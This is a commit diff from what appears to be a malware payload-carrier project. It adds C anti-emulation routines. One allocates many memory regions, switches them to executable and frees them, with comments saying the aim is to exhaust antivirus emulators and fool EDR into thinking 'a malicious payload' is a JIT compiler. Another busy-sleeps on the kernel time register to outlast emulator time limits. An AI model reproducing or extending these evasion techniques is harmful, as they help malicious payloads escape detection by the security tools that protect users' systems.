refactor: prepare antiemulation more modular

data/source/carrier/antiemulation/sirallocalot.c

@@ -0,0 +1,47 @@
+
+#define ALLOC_NUM 256
+
+
+/* This will allocate ALLOC_NUM RW memory regions, 
+     set them to RX, and free them 
+
+    The idea is that the AV emulator will probably give up, either because
+    of used memory is above maximum, or amount of instructions, or 
+    number of API calls, or time. 
+
+    It hopefully also makes the EDR think this program is doing some
+    kind of interpreter or JIT compilation, and not a malicious payload.
+*/
+
+void antiemulation() {
+    void* allocs[ALLOC_NUM];
+    DWORD result;
+
+    for(int n=0; n<ALLOC_NUM; n++) {
+        allocs[n] = VirtualAlloc(
+            NULL, 
+            0x1000, 
+            0x3000, 
+            p_RW
+        );
+    }
+
+    for(int n=0; n<ALLOC_NUM; n++) {
+        if (VirtualProtect(
+            allocs[n], 
+            1000, 
+            p_RX, 
+            &result) == 0) 
+        {
+            return 7;
+        }
+    }
+
+    BOOL bSuccess;
+    for(int n=0; n<ALLOC_NUM; n++) {
+        bSuccess = VirtualFree(
+                        allocs[n],
+                        1000,
+                        0x00008000); // MEM_RELEASE
+    }
+}

data/source/carrier/antiemulation/timeraw.c

@@ -1,4 +1,14 @@
 
+
+/* Busy sleep with time register
+
+    This function will busy sleep for the given amount of time.
+    It uses the kernel time register, which is not affected by
+    the sleep function (memory address 0x7ffe0004).
+
+    This may defeat the AV emulator (maximum time).
+*/
+
 int get_time_raw() {
     ULONG* PUserSharedData_TickCountMultiplier = (PULONG)0x7ffe0004;
     LONG* PUserSharedData_High1Time = (PLONG)0x7ffe0324;